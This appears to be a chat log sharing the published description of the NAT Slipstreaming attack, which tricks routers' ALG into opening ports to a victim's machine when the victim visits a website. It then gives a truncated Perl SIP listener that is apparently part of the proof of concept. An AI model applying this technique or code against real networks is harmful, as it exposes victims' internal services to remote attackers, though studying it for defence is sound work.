q

 NAT Slipstreaming exploits the user's browser in conjunction with the Application Level Gateway (ALG) connection tracking mechanism built into NATs, routers, and firewalls by chaining internal IP extraction via timing attack or WebRTC, automated remote MTU and IP fragmentation discovery, TCP packet size massaging, TURN authentication misuse, precise packet boundary control, and protocol confusion through browser abuse. As it's the NAT or firewall that opens the destination port, this bypasses any browser-based port restrictions.

[6:13 PM]

This attack takes advantage of arbitrary control of the data portion of some TCP and UDP packets without including HTTP or other headers; the attack performs this new packet injection technique across all major modern (and older) browsers, and is a modernized version to my original NAT Pinning technique from 2010 (presented at DEFCON 18 + Black Hat 2010). Additionally, new techniques for local IP address discovery are included.

This attack requires the NAT/firewall to support ALG (Application Level Gateways), which are mandatory for protocols that can use multiple ports (control channel + data channel) such as SIP and H323 (VoIP protocols), FTP, IRC DCC, etc.

[6:13 PM]

Released today official

[6:14 PM]

Still in project dm more info

[6:17 PM]

Simplify NAT Slipstreaming allows an attacker to remotely access any TCP/UDP services bound to a victim machine, bypassing the victim’s NAT/firewall, just by the victim visiting a website

[6:17 PM]

Heads up let's start re

[6:17 PM]

Executable File  168 lines (155 sloc)  3.33 KB(edited)

[6:19 PM]

#!/usr/bin/perl my $PORT = 5060;my $PROTO = shift || "tcp"; use IO::Socket;use strict; my $sock = IO::Socket::INET->new(    LocalPort => $PORT,    ReuseAddr => 1,    Blocking => $PROTO eq "udp",    Proto => $PROTO,    ($PROTO eq "tcp" ? (Listen => 1) : ())) || die $!;my $cli;print "Listening on port $PORT ($PROTO)\n";my $DATA = join "", <DATA>;my $msg;my @get;my $get;$SIG{INT} = sub { close($sock); close($cli); die; }; if ($PROTO eq "udp"){    while ($cli = $sock->recv($msg, 1024*4, 0))    {        print "- connected\n";#my ($port, $ip) = unpack_sockaddr_in($client);#my $host = gethostbyaddr($ip, AF_INET);#print "Client $host:$port sent '$message' at ", scalar(localtime), "\n";#$server->send("Message '$message' received", 0, $client);        $get = @get = map { "$_\n" } split(/\n/, $msg);        start();    }#$cli = $sock;}else{    while (1)    {        if ($cli = $sock->accept)        {            print "- connected\n";            eval {                local $SIG{ALRM} = sub { die };                alarm(5);                    start();                alarm(0);            };            eval { close($cli); };        }        select(undef, undef, undef, 0.1);    }print "ah\n";} sub start{    my %vars;    my $reg;    my $msg;    #while ($msg !~ /\r?\n\r?\n/) {    while (!$reg)    {    # TODO add timeout    # TODO support multiple users        while (1)